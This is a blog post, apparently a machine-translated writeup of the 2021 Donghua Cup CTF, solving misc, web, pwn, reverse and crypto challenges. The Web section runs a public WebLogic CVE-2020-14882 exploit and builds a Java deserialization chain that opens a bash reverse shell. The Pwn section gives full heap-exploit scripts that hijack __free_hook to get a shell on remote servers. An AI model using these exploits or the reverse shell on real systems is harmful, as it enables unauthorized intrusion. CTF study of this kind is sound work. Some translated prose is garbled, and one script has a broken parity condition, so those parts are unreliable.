2021 National College Students' network security Invitational Competition and the 7th "Donghua Cup" Shanghai college students' network security competition Writeup

2021 national college student network security Invitational Competition and the 7th "Donghua Cup" Shanghai University grid competition Writeup

Misc

checkin

The title gives + agyababhagcaewbkagagaygbfadcadaboah0 - UTF-7 encoding and decoding to get the flag

flag is:

flag{dhb_7th}

project

Download the attachment. After decompression, it is found that this is an industrial control problem, but after decompression, there is a compressed package problem_bak.zip

You're here~

There are three sections of data in total. The first section is base64 coding

6KGo5oOF5YyF5paH5YyW77yM5piv6ZqP552A572R57uc56S+5Lqk5rKf6YCa55qE5aKe5aSa5Ye6
546w55qE5LiA56eN5Li75rWB5paH5YyW44CC5LiA5Liq5Lq655qE6KGo5oOF5YyF5piv5YW26ZqQ
6JeP6LW35p2l55qE55yf5oiR77yM5LiA5Liq5Zu95a6255qE6KGo5oOF5YyF6YeM6IO955yL5Yiw
6L+Z5Liq5Zu95a6255qE6KGo5oOF44CC4oCM4oCM4oCM4oCM4oCN4oCs4oCs4oCM5pyJ5pe25YCZ
77yM6KGo5oOF5YyF6KGo6L6+55qE5piv5LiN6IO96YGT56C055qE55yf5a6e5oOz5rOV5ZKM5oSf
5Y+X77yM6K+t6KiA5ZKM5paH5a2X55qE5bC95aS077yM5bCx5piv6KGo5oOF5YyF5pa95bGV55qE
56m66Ze044CCDQrooajmg4XljIXmmK/nvZHnu5zor63oqIDnmoTkuIDnp43ov5vljJbvvIzlroPn
moTkuqfnlJ/lkozmtYHooYzkuI7lhbbnibnlrprnmoTigJzigIzigIzigIzigIzigI3vu7/igI3i
gI3nlJ/lrZjnjq/looPigJ3mnInlhbPjgILlhbbov73msYLphpLnm67jgIHmlrDlpYfjgIHosJDo
sJHnrYnmlYjmnpznmoTnibnngrnvvIzigIzigIzigIzigIzigI3vu7/igIzigKzkuI7lubTovbvk
urrlvKDmiazkuKrmgKflkozmkJ7mgKrnmoTlv4PnkIbnm7jnrKbigIzigIzigIzigIzigI3vu7/i
gIzigKzjgIINCuihqOaDheWMheS5i+aJgOS7peiDveWkn+Wkp+iMg+WbtOWcsOS8oOaSre+8jOKA
jOKAjOKAjOKAjOKAje+7v+KArOKAjeaYr+WboOS4uuWFtuW8peihpeS6huaWh+Wtl+S6pOa1geea
hOaer+eHpeWSjOaAgeW6puihqOi+vuS4jeWHhuehrueahOW8seeCue+8jOacieaViOWcsOaPkOmr
mOS6huayn+mAmuaViOeOh+OAgumDqOWIhuihqOaDheWMheWFt+acieabv+S7o+aWh+Wtl+eahOWK
n+iDve+8jOKAjOKAjOKAjOKAjOKAje+7v+KAjeKAjei/mOWPr+S7peiKguecgeaJk+Wtl+aXtumX
tOKAjOKAjOKAjOKAjOKAje+7v+KAjOKAjOOAgumaj+edgOaZuuiDveaJi+acuueahOWFqOmdouaZ
ruWPiuWSjOekvuS6pOW6lOeUqOi9r+S7tueahOWkp+mHj+S9v+eUqO+8jOihqOaDheWMheW3sue7
j+mrmOmikeeOh+WcsOWHuueOsOWcqOS6uuS7rOeahOe9kee7nOiBiuWkqeWvueivneW9k+S4reOA
gg0K

Decoding results:

Expression pack culture is a mainstream culture with the increase of network social communication. A person's expression bag is his hidden true self. The expression of a country can be seen in the expression bag of a country.‌‌‌‌‍‬‬‌Sometimes, expression packs express unspeakable real thoughts and feelings. The end of language and words is the space for expression packs.
Expression package is an evolution of network language. Its emergence and popularity are related to its specific characteristics“‌‌‌‌‍‍‍"Living environment". It pursues striking, novel, banter and other effects,‌‌‌‌‍‌‬It is consistent with young people's personality and funny psychology‌‌‌‌‍‌‬. 
The reason why expression packs can spread widely,‌‌‌‌‍‬‍Because it makes up for the weakness of boring written communication and inaccurate attitude expression, and effectively improves the communication efficiency. Some expression packs have the function of replacing text,‌‌‌‌‍‍‍It can also save typing time‌‌‌‌‍‌‌. With the full popularity of smart phones and the extensive use of social applications, expression packs have appeared in people's online chat conversations with high frequency.

The result of this decoding can obviously observe the hidden characters

Get hurryup by solving the 0 wide character. Obviously, it should be a key somewhere, but it hasn't been encountered yet. Continue to look down

Online solution 0 wide character web address: https://330k.github.io/misc_tools/unicode_steganography.html

The second part says that it is quoted printable encryption. The encoding method is obtained by online decryption

The text is consistent with the text in the first paragraph base64.

The third paragraph says that it is a jpg picture and base64 encrypted data

There is no header added to this base64 data, and data: image / JPG is added by itself; base64, and then turn it into a picture to get this picture

Open it with 010 and find that there is redundant data after FF D9 at the end of the picture

Finally, it is found that OurSecret steganography is used, because if you open it with this software, if the image is not OurSecret steganography, the data size will not be displayed

The size of the data is shown here, which proves that it is OurSecret steganography. The key is the first 0-wide decrypted hurryup

So the flag is:

flag{f3a5dc36-ad43-d4fa-e75f-ef79e2e28ef3}

JumpJumpTiger

jump.exe opens ida and finds hint

int  main(int argc, const char **argv, const char **envp)
{
	int v4[100]; // [rsp+20h] [rbp-60h]
	int v5[101]; // [rsp+1B0h] [rbp+130h]
	int v6; // [rsp+344h] [rbp+2C4h]
	int v7; // [rsp+348h] [rbp+2C8h]
	int i; // [rsp+34Ch] [rbp+2CCh]

	printf("This is your hint!!!");
	v7 = 0;
	v6 = 0;
	for (i = 0; i <= 99; ++i)
	{
		if (i & 1)
			v4[v6++] = i;
		else
			v5[v7++] = i;
	}
	return 0;
}

Roughly, parity separation.

Check the internal code of jump.exe and find a large number of suspected base64 codes. Extract them directly

/i9VjB/O4RAwA0QKSGkgZoJARAgAAABNASQUEhAEAUQgAABAABA4DA/A2AwABQD4ACAAUIDABAAAQBEnAswVUYEUBAAAQAFgBAQEUlGEBQwVwRI4BAwWcTHBBQwZ8YLsC5w5kaMcE1Q88/SsEuhCEcPAEURvEOTfFFhdwUXiERx8QBaaFaRqEtRBGsCtE7YNG+hI08dZHIxx8xfIE6xtcbiSJ3CvIrevJ/B/wWe/H9xA7f/Q2NwkBnDbAJQJUJFsBXQ9ccG1BMw74aIBCtAr4veLFQBxEKU/HShZ4ee3HChm4xefHYhk4CeAH/hN42eqHrhT...Eight million characters in total

Try parity separation directly

file = open("in.txt")
file2 = open("out.txt","r+")
for line in file:
    tmp = line
    print(tmp)
    s = ''
    for i in range(len(tmp)):
        if i & 2 == 1:
        #if i % 2 == 1:
            s += tmp[i]
    file2.write(s)
    print(len(s))

Just got two strings of base64 codes, both ending with the = sign

/9j/4AAQSkZJRgABAQEAAQABAAD/2wBDAAUDBAQEAwUEBAQFBQUGBwwIBwcHBw8LCwkMEQ8SEhEPERETFhwXExQaFRERGCEYGh0dHx8fExciJCIeJBweHx7/2wBDAQUFBQcGBw4ICA4eFBEUHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh7/wAARCAQ4B4ADAREAAhEBAxEB/8QAHQAAAgIDAQEBAAAAAAAAAAAAAQIAAwQFBgcICf/EAEUQAQABAwMDAwMDAwMDAwECDwECAAMRBBIhBTFBBiJR...Four million characters in total

Decode them separately and get a jpg and a png. The two pictures look the same, which is obviously a blind watermark. Use the command directly:

python bwmforpy3.py decode 2.jpg 2.png flag.png

Get flag.png and open it to see the flag

flag is:

flag{72f73bbe-9193-e59a-c593-1b1cb8f76714}

Web

apacheprOxy

Open the attachment and find that this is Weblogic

Weblogic has a cve-2020-14882 remote command execution vulnerability, and there is a ready-made exp on GitHub

EXP address: https://github.com/zhzyker/exphub/blob/master/weblogic/cve-2020-14882_rce.py

Because of the anti generation, direct access to the i spring and autumn official website. Grab a bag to get the real topic environment address

Use command:

python 1.py -u "http://47.104.100.25:7410/" -c "ls /"

Then directly cat /flag:

python 1.py -u "http://47.104.100.25:7410/" -c "cat /flag"

So the flag is:

flag{da77ef49-5958-40d5-b426-664b8299e576}

EzGadget

Start audit, IndexController.java

.....
ObjectInputStream objectInputStream = new ObjectInputStream(inputStream);
        String name = objectInputStream.readUTF();
        int year = objectInputStream.readInt();
        if (name.equals("gadgets") && year == 2021) {
            objectInputStream.readObject();
        }
.....

Bypass here and output the stream again

oos.writeUTF("gadgets");
oos.writeInt(2021);

Just fine

ToStringBean.java

public String toString() {
        ToStringBean toStringBean = new ToStringBean();
        Class clazz = toStringBean.defineClass((String)null, this.ClassByte, 0, this.ClassByte.length);
        Object var3 = null;

        try {
            var3 = clazz.newInstance();
        } catch (InstantiationException var5) {
            var5.printStackTrace();
        } catch (IllegalAccessException var6) {
            var6.printStackTrace();
        }

        return "enjoy it.";
    }

You can see that the bytecode is loaded. The function to load the bytecode here is toString. The readobject method of badattributevalueexception of cc5 chain just calls toString. This class comes with jdk and the parameters are controllable

import com.ezgame.ctf.tools.ToStringBean;
import ezgame.ctf.bean.User;


import javax.management.BadAttributeValueExpException;
import java.io.IOException;
import java.io.InputStream;
import java.lang.reflect.Field;

public class exp {
    public static void main(String[] args) throws Exception {
        InputStream inputStream = evil.class.getResourceAsStream("evil.class");
        byte[] bytes = new byte[inputStream.available()];
        inputStream.read(bytes);

        ToStringBean sie =new ToStringBean();
        Field bytecodes = Reflections.getField(sie.getClass(),"ClassByte");
        Reflections.setAccessible(bytecodes);
        Reflections.setFieldValue(sie,"ClassByte",bytes);

        BadAttributeValueExpException exception = new BadAttributeValueExpException("exp");
        Reflections.setFieldValue(exception,"val",sie);
				String a=Serialize.serialize(exception);
        System.out.print(a);

    }
}

Bytecode class loaded

class exp{

static {
try {
	Runtime.getRuntime().exec("bash -c 'bash -i >& /dev/tcp/ip/port 0>&1'");
	}
	catch(){
	}
}

}

Let's go in here

writeUTF("gadgets");
writeInt(2021);

The generated payload can be hit directly, and then vps monitors the shell that receives the rebound

Pwn

cpp1

2.31 the vulnerability point is in edit, which can cause overflow
Fill tcache with a chunk of 0x80, and then print size
Cause heap fast overlap, and release the overlapping heap blocks into the unsortedbin
Then show the normal tcache attack overflow after libc and call freebook as system getshell

Exp is as follows:

from pwn import*

context.log_level = "debug"

#io = process("./pwn")
io = remote("47.104.143.202","43359")

def menu(choice):
	io.sendlineafter(">>",str(choice))

def add(index,size):
	menu(1)
	io.sendlineafter(">>",str(index))
	io.sendlineafter(">>",str(size))

def edit(index,content):
	menu(2)
	io.sendlineafter(">>",str(index))
	io.sendlineafter(">>",content)

def show(index):
	menu(3)
	io.sendlineafter(">>",str(index))

def delete(index):
	menu(4)
	io.sendlineafter(">>",str(index))

def look():
	global io
	gdb.attach(io)

for i in range(0,7):
	add(i,0x80)

add(7,0x18)
add(8,0x50)
add(9,0x20)
add(10,0x30)

edit(7,b"a"*0x10 + p64(0) + b"\x91")

for i in range(0,7):
	delete(i)

delete(8)

for i in range(0,7):
	add(i,0x80)

add(8,0x50)
show(9)

info = u64(io.recvuntil("\x7f")[-6:].ljust(8,b"\x00"))
malloc_hook = info - 96 - 0x10
libc = ELF("./libc-2.31.so")
libc_base = malloc_hook - libc.sym["__malloc_hook"]
free_hook = libc_base + libc.sym["__free_hook"]
success("free_hook:"+hex(free_hook))
system = libc_base + libc.sym["system"]

add(11,0x20)

add(12,0x18)
add(13,0x18)
add(14,0x18)

delete(12)
delete(14)
edit(13,p64(0)*3 + p64(0x21) + p64(free_hook))

add(14,0x18)
add(15,0x18)

edit(15,p64(system))
edit(14,"/bin/sh\x00")

delete(14)

io.interactive()

flag is:

flag{96f7801e4e658271915cf5ab3aa26ee6}

bg3

Leak libc: because you can apply for a large chunk, so
Release a > 0x420chunk into the unsortedbin, and then apply back to show libc directly
get shell: the vulnerability point is in add. The size of the same index can be superimposed
So hit free through overflow_ Hook is system get shell

Exp is as follows:

from pwn import*

context.log_level = "debug"

io = remote("47.104.143.202","25997")
#io = process("./pwn")

def menu(choice):
	io.sendlineafter("Select:",str(choice))

def add(index,size): 
	menu(1)
	io.sendlineafter("Index:",str(index))
	io.sendlineafter(":",str(size))

def edit(index,content):
	menu(2)
	io.sendlineafter("Index:",str(index))
	io.sendlineafter("BugInfo:",content)

def show(index):
	menu(3)
	io.sendlineafter("Index:",str(index))

def delete(index):
	menu(4)
	io.sendlineafter("Index:",str(index))

def look():
	global io
	gdb.attach(io)

add(0,0x420)
add(1,0x18)
delete(0)
add(0,0x420)
show(0)
info = u64(io.recvuntil("\x7f")[-6:].ljust(8,b"\x00"))
print(hex(info))
libc = ELF("./libc-2.31.so",checksec = 0)
malloc_hook = info - 96 - 0x10
libc_base = malloc_hook - libc.sym["__malloc_hook"]
system = libc_base + libc.sym["system"]
free_hook = libc_base + libc.sym["__free_hook"]

add(2,0x18) #fuck!
delete(2)
add(2,0x18)
delete(2)
add(2,0x18)
delete(2)
add(2,0x18)

add(3,0x18)
add(4,0x18)
delete(4)
delete(3)
edit(2,p64(0)*4 + p64(free_hook))
add(5,0x18)
add(6,0x18)
edit(6,p64(system))
edit(5,b"/bin/sh\x00")
delete(5)

io.interactive()

flag is:

flag{7240aca686aa4bc4d7697b2d7b5c7655}

gcc2

The vulnerability is in Remove. There is uaf.
leak_libc: first disclose the heap address through uaf
Then change the fd pointer of tcache to point to the original address + 0x10
When the re application comes back, it can cause 0x10 overflow in the fast downward direction of the heap, and the overflow size is changed to 0xe1
Then edit the chunk of 0xe1 to bypass the double free check
Release the chunk into tcache 7 times
Release again. Enter the unseortedbin show to get libc
Finally, use uaf to directly tcache attack and hit free_hook is system get shell

from pwn import*

context.log_level = "debug"

#io = process("./pwn")
io = remote("47.104.143.202","15348")

def menu(choice):
	io.sendlineafter(">>",str(choice))

def add(index,size):
	menu(1)
	io.sendlineafter(">>",str(index))
	io.sendlineafter(">>",str(size))

def edit(index,content):
	menu(2)
	io.sendlineafter(">>",str(index))
	io.sendlineafter(">>",content)

def show(index):
	menu(3)
	io.sendlineafter(">>",str(index))

def delete(index):
	menu(4)
	io.sendlineafter(">>",str(index))

def look():
	global io
	gdb.attach(io)

add(0,0x60)
add(1,0x60)
add(2,0x60)
add(3,0x60)
add(4,0x18)

delete(1)
edit(1,p64(0)+p64(0x71))
delete(0)
show(0)
io.recvuntil("\n")
chunk_addr = u64(io.recv(6).ljust(8,b'\x00'))
print(hex(chunk_addr))
fake_addr = chunk_addr + 0x10
print(hex(fake_addr))
edit(0,p64(fake_addr))

add(5,0x60)
add(6,0x60)
edit(6,b"a"*0x58 + b"\xe1")

for i in range(0,7):
	edit(2,p64(0)*2)
	delete(2)

edit(2,p64(0)*2)
delete(2)
show(2)
info = u64(io.recvuntil("\x7f")[-6:].ljust(8,b"\x00"))
print(hex(info))

libc = ELF("./libc-2.31.so",checksec = 0)
malloc_hook = info - 96 - 0x10
libc_base = malloc_hook - libc.sym["__malloc_hook"] 
free_hook = libc_base + libc.sym["__free_hook"]
system =  libc_base + libc.sym["system"]

add(9,0x18)
add(10,0x18)
delete(9)
delete(10)
edit(10,p64(free_hook))
add(11,0x18)
add(12,0x18)

edit(12,p64(system))
add(13,0x18)
edit(13,b"/bin/sh\x00")
delete(13)
io.interactive()

flag is:

flag{c9749ef8cbfdc4fc56542daea489a71c}

boom_script

This problem is related to the c interpreter. Just a while ago, a master sent me a similar problem. This problem is a loophole in uaf. Through string transformation, you can apply for and release heap blocks for disclosure and getshell

Exp:

from pwn import*

context.log_level = "debug"

#io = process("./boom_script")
io = remote("47.104.143.202","41299")

def look():
	global io
	gdb.attach(io)

def shell(payload):

	io.recvuntil("$")
	io.sendline(str(1))
	io.recvuntil('length:')
	io.sendline(str(len(payload)))
	io.recvuntil('code:')
	io.send(payload)


def main():
	#the code to leak main_arena + offset and to fuck the libc
	payload="""
    a="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa";
	b=a;
	a="bbbbbb";
	c=0;
	prints(b);
	array arr[20];
	arr[0]=1193046;
	arr[1]=1193046;
	b="asdasd";
	a1="cccccccc";
	a2="cccccccc";
	a3="cccccccc";
	a3="cccccccc";
	a4="cccccccc";
	a5="cccccccc";
	a9="cccccccc";
	tc="sssssssssssssssssssssssssssssssssssssssssssssssss";
	a6="sssssssssssssssssssssssssssssssssssssssssssssssss";
	a7="/bin/sh";
	a8="/bin/sh";
	a6="ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss";
	tc="ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss";
	prints("dddddd");
	inputn(c);
	arr[0]=c;
	arr[1]=c;
	tc1="sssssssssssssssssssssssssssssssssssssssssssssssss";
	array arr1[1];
	prints("dddddd");
	inputn(c);
	arr1[0]=c;
	a7="aaa";
	inputn(c);
    """

	shell(payload)
	libc_base=u64(io.recvuntil("\x7f")[-6:].ljust(8,b'\x00'))-0x1ebbe0
	libc=ELF('./libc.so.6',checksec = 0)
	success("libc_base"+hex(libc_base))

	free_hook=libc_base+libc.sym['__free_hook']
	system=libc_base+libc.sym['system']
	success("free_hook:"+hex(free_hook))
	success("system:"+hex(system))

	#fuck the free_hook to the system
	io.sendlineafter("dddddd\n",str(free_hook-0x28))
	io.sendlineafter("dddddd\n",str(system))

	io.interactive()

if __name__ == '__main__':
	main()

flag is:

flag{35f2d3a9-bddc-9ffe-e8f7-ab999010b196}

Reverse

ooo

Send sub questions, that is, it's slow to do, woo woo woo

Just do it. As always, be lazy and run violently

flag is:

flag{13f35663-50a4-477b-278b-b711026ff7ad}

mod

The key to this problem is the removal of flower instructions. Secretly lazy, only remove the algorithm segment and lose IDA F5

All right, base magic change, too lazy to analyze the algorithm, run directly and violently

flag:

flag{5a073724-8223-413d-11fa-d53b133df89e}

Hell's Gate

When I first got this question, I saw a lot of 0x100. I felt very excited (seconds, seconds). According to my habit, I would explode first and then analyze the algorithm. When I went one step to the figure below, I found that the pointer here was abnormal, indicating that there was something like exception handling, and then as expected....

As for the 00416F90 function, it seems that some of the above functions are de debugging (my OD is not detected anyway, it is estimated that windbg is detected). If you can handle it, please handle it, but elaborate more. Find the algorithm section and find some strange things, similar to the figure below. There are many kinds of this code.

Retf, as the name suggests, can assign values to the cs register. When the cs register is 23, it represents the 32-bit assembly mode, and when it is 33, it represents the 64 bit assembly mode. Therefore, the following assembly code is 64 bit, and windbg seems unable to debug (it's too lazy to find reasons, like an exception). Because the amount of call code for each 64 bit assembly is generally small, I use CE to look at the assembly code, Analyze the functions one by one, as shown in the figure below, which is a pointer assignment call. After a period of analysis, it is found that it is the tea algorithm

The script is as follows:

flag is:

flag{0f4d0db3-668d-d58c-abb9-eb409657eaa8}

hello

Call JNI

String2 can be found using log

So code

The script is as follows:

raw_sign = '308202e4308201cc020101300d06092a864886f70d010105050030373116301406035504030c0d416e64726f69642044656275673110300e060355040a0c07416e64726f6964310b30090603550406130255533020170d3231303330363134333034385a180f32303531303232373134333034385a30373116301406035504030c0d416e64726f69642044656275673110300e060355040a0c07416e64726f6964310b300906035504061302555330820122300d06092a864886f70d01010105000382010f003082010a0282010100cbf2b09e4308ebb459e8841e5a7b920497fef2b349e80648f7eb35f48d40a75e7ce7945b8b42d197bec0bf177e6c9899ed707dcc4a726cb14c1a69b0c4a02474806fa73cfb10e10f7b1665021c24762b6edad65ca63cea3c72e0d4e4ca3f98301173eec3254337af1f5a11f779ecbe04d1b74d53f5835e011222155a56f97e00d75374cd93080dfa087cd356a99fe1eebf5d6d5e31846aad5252c3a17a4656e2e210ce1c7aa4d147fb8cf440a50add61bbb2ec299a2e0dab0b4504796ac3a899da553ab1d83576691ab23409d18398014b3b5eaf12e83f4d99aa09e1e4e4cae133530730c1133da2b3dee37b58eb1a5795b221ec5a8830731a41167d295f9e1b0203010001300d06092a864886f70d010105050003820101000e4740235e9cf2be33de3e06d777139cbbc5cf0622285c17da04697b8067318aaf8df0fbb4d3166f293ea15aa2592f06eb6929af063722ac9f30ad85e2c087564931d6ac65fcd5fbc864b3dc9841e039c6e1d5fbc5c2f8adf90a547bc4ebc07d387914db24451c2cc89925359bd3bb0750c7aabf9d743b1893e98bbc8ff74b24fc0b4be2dbaaf1c917bba01496d0617ffc3a4a8b7a6e79a3036298a6ebf57bb00001e43a0b242864eebb0fcec9e323144d4447c878430f18e6e358ad97566fa04d1f07b171c1476c9af5a1eba0bf6616e219c0b9e1299d09fecded24a880397f92e0f99d8951228c7770c184fd77adff943bfc8b6aa524c5f0a6d7686fe35486'
enc = [0xCA, 0xEB, 0x4A, 0x8A, 0x68, 0xE1, 0xA1, 0xEB, 0xE1, 0xEE,
	   0x6B, 0x84, 0xA2, 0x6D, 0x49, 0xC8, 0x8E, 0x0E, 0xCC, 0xE9,
	   0x45, 0xCF, 0x23, 0xCC, 0xC5, 0x4C, 0x0C, 0x85, 0xCF, 0xA9,
	   0x8C, 0xF6, 0xE6, 0xD6, 0x26, 0x6D, 0xAC, 0x0C, 0xAC, 0x77,
	   0xE0, 0x64]

for i in range(0, 42):
	enc[i] = (enc[i] << 3 & 0xff) + (enc[i] >> 5 & 0xff)
flag = ""
for i in range(len(enc)):
	index = i * 27 + 327
	magic = ord(raw_sign[index]) + i
	flag += chr(magic ^ enc[i])
print flag

flag is:

flag{d5577edd-8211-7a0e-f23a-305b0b10683f}

Crypto

BlockEncrypt

Decompile to get the incomplete encryption function, which can be found to be aes, and then decrypt

The script is as follows:

from pwn import *
import hashlib
import string


s="flag{abcdef0123456789-}"

def f(a,b):
	m=[]
	for i in range(10):
		m.append(str(i))
	for i in range(26):
		m.append(chr(i+0x41))
		m.append(chr(i+0x61))
	for i in m:
		for j in m:
			for k in m:
				for p in m:
					t=i+j+k+p+a
					if(hashlib.sha256(t.encode()).hexdigest()==b):
						print("find")
						return t[:4]


sh=remote("47.104.183.8","47971")
sh.recvuntil(b"X+")
a=(sh.recvuntil(b")",drop=True).decode())

sh.recvuntil(b"== ")
b=(sh.recvuntil(b"\n",drop=True).decode())
sh.send(f(a,b).encode())
sh.recv()
print(sh.recv().decode())

sh.send(b'1')
sh.recv()
sh.recvuntil(b"\n",drop=True)
flag=(sh.recvuntil(b"\n[+]",drop=True))
print()

t=0
r=""
while 1:
	for i in s:
		m=r+i
		m=m.encode()
		sh.send(b'2')
		sh.send(m)
		sh.recv()
		sh.recv()
		sh.recvuntil(b"CipherText:",drop=True)
		c=(sh.recvuntil(b"\n[+]",drop=True))
		if(c[t]==flag[t]):
			r=r+i
			t+=1
			print(r)

flag is:

flag{ad7e9276-de18-52b8-8c1c-3db559274f2d}

Tags: security Web Security CTF

Posted on Sun, 31 Oct 2021 19:52:34 -0400 by Akira